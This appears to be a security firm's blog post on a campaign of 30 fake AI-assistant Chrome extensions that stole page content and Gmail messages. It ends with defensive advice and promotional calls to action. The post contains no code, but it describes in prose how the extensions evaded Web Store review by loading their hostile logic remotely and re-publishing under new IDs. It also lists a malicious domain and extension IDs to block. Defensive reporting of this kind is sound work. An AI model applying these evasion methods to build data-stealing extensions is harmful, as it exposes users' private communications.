← Back to Blog

260,000 People Installed "AI Assistant" Chrome Extensions That Were Stealing Their Data

· Don Ho

Last updated: February 2, 2026

Last updated: April 2026

Security firm LayerX discovered 30 malicious Chrome extensions disguised as AI assistants for ChatGPT, Claude, Gemini, and Grok — installed by over 260,000 users — that injected hidden iframes, extracted page content from every website visited, read Gmail messages directly from the DOM, and exfiltrated everything to a command-and-control server. Several of these extensions were “Featured” by the Chrome Web Store.

Several of these extensions were “Featured” by the Chrome Web Store. Google’s own curation process gave them a trust badge while they were actively stealing user data. Meanwhile, Google shut down a lawyer’s NotebookLM account for a terms-of-service technicality — the priorities are telling.

How the Attack Worked

LayerX named the campaign “AiFrame.” All 30 extensions shared identical code architecture, permissions, and backend infrastructure despite having different names, branding, and Chrome Web Store listings. This is a technique called extension spraying: publish the same malicious code under multiple identities so that when one gets taken down, the others survive.

The core mechanism was an iframe injection. When a user installed the extension and opened a new tab or clicked the extension icon, it loaded a full-screen iframe from a remote server (a subdomain of tapnetic.pro themed to match the fake AI brand). This iframe looked like a legitimate AI chat interface. Behind the scenes, it had full access to the extension’s permissions.

The extension could extract readable content from any page the user was viewing using Mozilla’s Readability library. It pulled titles, text content, excerpts, and metadata. That means if you were looking at an internal company document, a confidential email, or a client portal, the extension could read it and send it to the attacker’s server.

Gmail Was the Primary Target

Fifteen of the 30 extensions specifically targeted Gmail. Each included a dedicated content script that ran on mail.google.com at document load. The script injected UI elements into Gmail’s interface and used MutationObserver (a browser API that watches for page changes) to persistently monitor the email interface.

The Gmail module read email content directly from the DOM. It extracted message text from conversation views using textContent selectors. When users invoked “AI-assisted” features like email summarization or reply drafting, the extension sent the full email thread to the tapnetic.pro backend.

Think about what’s in your Gmail: client communications, contract drafts, financial information, login credentials, password reset links, HR correspondence. This extension had access to all of it. These are the kinds of real-world AI safety risks that most organizations haven’t begun to account for.

Google’s Review Process Failed

The Chrome Web Store has a review process for extensions before they’re published. Several of these malicious extensions passed that review and received “Featured” status, which is supposed to indicate a higher level of trust and quality.

The extensions evaded detection because their malicious behavior was delivered remotely. The code that ran inside the iframe was hosted on the attacker’s server, not in the extension package that Google reviewed. When Google analyzed the extension code at submission time, it looked clean. The actual surveillance functionality loaded later from tapnetic.pro.

This is a known weakness in browser extension security. The extension requests broad permissions (access to all URLs, ability to read page content), which many legitimate extensions also require. The actual malicious behavior lives on a server that can be updated without pushing a new extension version through Google’s review.

LayerX also documented active evasion of Chrome Web Store enforcement. When Google removed one extension (ID: fppbiomdkfbhgjjdmojlogeceejinadg) on February 6, 2025, an identical extension appeared under a new ID (gghdfkafnhfpaooiolhncejnlgglhkhe) two weeks later. Same code, same permissions, same infrastructure. Different name.

The Enterprise Risk

This isn’t just a consumer problem. Employees install Chrome extensions on work machines. Many companies don’t restrict or audit browser extensions through their endpoint management. A single employee installing a “Claude AI Assistant” extension to help draft emails could expose the company’s entire Gmail environment to a third-party attacker.

The risk multiplies with remote work. Personal devices accessing corporate Gmail, employees installing productivity tools without IT approval, browser extensions that bypass network-level security controls. Your CASB doesn’t inspect iframe content loaded by a browser extension. Your DLP tool doesn’t flag data exfiltration through a WebSocket connection from an extension to a remote server. And GitHub Copilot’s default opt-out for code training shows this pattern isn’t limited to shady extensions — even legitimate tools are routing your data places you didn’t authorize. The Perplexity class action shows the same data exfiltration pattern at the platform level: AI tools routing user data to third parties without consent.

What to Do Now

Audit your organization’s browser extensions immediately. Chrome Enterprise and Microsoft Endpoint Manager both offer extension management capabilities. Pull a list of every extension installed across your fleet. Cross-reference against known malicious extension IDs (LayerX published the full list in their research).

Restrict extension installation by policy. Use Chrome’s ExtensionInstallBlocklist and ExtensionInstallAllowlist policies to control which extensions employees can install. Consider requiring IT approval for any extension that requests broad permissions like “Read and change all your data on all websites.”

Block tapnetic.pro and its subdomains at the network and DNS level. Add the domain to your firewall blocklist and DNS sinkhole. If any endpoints are already communicating with this domain, treat those machines as compromised.

A structured AI compliance stack with a guardrails layer that covers shadow AI tools is the framework for managing this risk at scale.

Don’t trust Chrome Web Store “Featured” badges. Google’s review process is not a security guarantee. It’s a quality signal at best. Evaluate extensions based on their permissions, code transparency, developer reputation, and independent security analysis. A badge from Google means Google looked at it. It doesn’t mean Google caught everything.

Shadow AI is already in your browser. Take the ACRA to identify the AI tools your employees are using without approval.

The 260,000 users who installed these extensions thought they were getting AI productivity tools. They got surveillance. Your employees might be among them.

Kaizen AI Labs

Ready to Deploy AI in Your Business?

Schedule a discovery call with our AI consulting team. We'll map your operations, identify leverage points, and show you exactly where AI moves the needle.

Book a Consulting Call
AI

Adjacent Media by Kaizen Labs

Is Your Brand Visible to the Bots?

Get a free GEO audit and find out if your brand is being cited, found, or completely invisible in AI-generated answers. Then let's fix it.

Get a Free GEO Audit
GEO